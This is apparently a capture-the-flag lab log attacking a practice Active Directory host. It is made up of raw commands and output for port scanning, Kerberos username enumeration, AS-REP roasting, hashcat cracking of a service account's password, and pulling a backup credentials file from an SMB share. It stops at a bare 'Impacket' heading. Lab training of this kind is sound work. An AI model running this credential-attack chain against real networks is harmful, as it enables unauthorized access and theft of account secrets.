Attacktive Directory
Nmap
root@ip-10-10-166-54:~# nmap -sV 10.10.161.54
Starting Nmap 7.80 ( <https://nmap.org> ) at 2025-06-15 22:08 BST
Nmap scan report for 10.10.161.54
Host is up (0.00091s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-15 21:08:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port53-TCP:V=7.80%I=7%D=6/15%Time=684F3652%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\\0\\x1e\\0\\x06\\x81\\x04\\0\\x01\\0\\0\\0\\0\\0\\0\\x07version\\
SF:x04bind\\0\\0\\x10\\0\\x03");
MAC Address: 02:B9:B4:92:F6:DB (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 150.78 seconds
Enum4linux
root@ip-10-10-166-54:~# enum4linux -U -o 10.10.161.54
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Sun Jun 15 22:09:37 2025
==========================
| Target Information |
==========================
Target ........... 10.10.161.54
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.161.54 |
====================================================
[+] Got domain/workgroup name: THM-AD
=====================================
| Session Check on 10.10.161.54 |
=====================================
[+] Server 10.10.161.54 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.161.54 |
===========================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.161.54 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.161.54 from smbclient:
[+] Got OS info for 10.10.161.54 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.161.54 |
=============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jun 15 22:09:38 2025
Kerbrute
root@ip-10-10-166-54:~# kerbrute userenum -d spookysec.local --dc 10.10.161.54 userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: v1.0.3 (9dad6e1) - 06/15/25 - Ronnie Flathers @ropnop
2025/06/15 22:35:21 > Using KDC(s):
2025/06/15 22:35:21 > 10.10.161.54:88
2025/06/15 22:35:21 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:21 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:21 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:21 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:22 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:23 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:25 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:25 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:29 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:30 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:37 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:51 > [+] VALID USERNAME: [email protected]
2025/06/15 22:35:56 > [+] VALID USERNAME: [email protected]
2025/06/15 22:36:11 > [+] VALID USERNAME: [email protected]
2025/06/15 22:36:16 > [+] VALID USERNAME: [email protected]
2025/06/15 22:36:24 > [+] VALID USERNAME: [email protected]
2025/06/15 22:36:45 > Done! Tested 73317 usernames (16 valid) in 84.364 seconds
Impacket
root@ip-10-10-166-54:~# python3.9 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -dc-ip 10.10.161.54 -usersfile userlist1.txt -format hashcat -outputfile hashes1.txt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set
root@ip-10-10-166-54:~# cat hashes1.txt
[email protected]:f566d528b6754f8f1bcde730a30259ad$b7c0aa20eebc15bb4d7a5c533d8801fdbcf40497f25a8313133a8c4ec1e03603d7b5b96705dc855e43520e3a95aceb4498936e439fbe4e7ed5dd8a9c05acd0003cba3b6f91af2bf0ada11deb3e85e2ef850b1a4dc18b7ad684af73e7b7b1ec583f7bbbc9239f4675fc9f6c10150ba7dc5fec4ba623dea9b85c6a2ed9c6eaa6e3d0adc0c6fcce77456f327111693d936742a9e92540e622d3e691ac5002f96a28811395bd81b873763607b235afb59f5baacae368bf7b7ce64b1379e3f20a122800168427713db241719c91749dae5d86b7bb6e56226c5d3b882c4500b3f5fd7fb1464fd59e2b760d8a7cf5bb975b956f1988
Hashcat
root@ip-10-10-166-54:~# hashcat -a 0 -m 18200 hashes.txt passwordlist.txt
hashcat (v6.1.1-66-g6a419d06) starting...
* Device #2: Outdated POCL OpenCL driver detected!
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3800/3864 MB (966 MB allocatable), 2MCU
OpenCL API (OpenCL 1.2 pocl 1.4, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
=============================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 35 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
[email protected]:3f3e903d83a67ecd9045b71c98178e08$9ccc43641ed4722ec3d941837440a265f86babdd4b97e0c417b8cbfb0f007f72cd89297400423fdcca1cdd81690b5a203222ee99e726fe6787736a30b7b7ce79fc6f97c47c4353f814d486f8085ee17ff408295bc2296c8b951c4eb9a30257b3a5136d1e31a2731e75abcc6057b380a3eb1b0e6b392d371425aa39db7625bd746f193ea1ec8fa3ca08800806b887d4b8ece4df827eec458ffc9429994c22a16f5c3c4ce5c4243b3ba0bf83588f2156fee42fa243b7ba82dbdc7a9863e5ec44892352292568297cfe223b2fa6ebb5050e9acc0cb379217adcb17dcc3ae328c38810538eb4754efdeaf37d3b107b965cf00980:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:3f3e903d83a...f00980
Time.Started.....: Sun Jun 15 23:23:20 2025 (0 secs)
Time.Estimated...: Sun Jun 15 23:23:20 2025 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 330.0 kH/s (9.24ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/70188 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitey
Started: Sun Jun 15 23:22:28 2025
Stopped: Sun Jun 15 23:23:21 2025
SMBClient
root@ip-10-10-166-54:~# smbclient -L //spookysec.local -U svc-admin
Password for [WORKGROUP\\svc-admin]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
root@ip-10-10-166-54:~# smbclient //spookysec.local/backup -U svc-admin
Password for [WORKGROUP\\svc-admin]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 3640410 blocks available
smb: \\> get backup_credentials.txt
getting file \\backup_credentials.txt of size 48 as backup_credentials.txt (4.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \\> ^C
root@ip-10-10-166-54:~# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
[email protected]:backup2517860
Impacket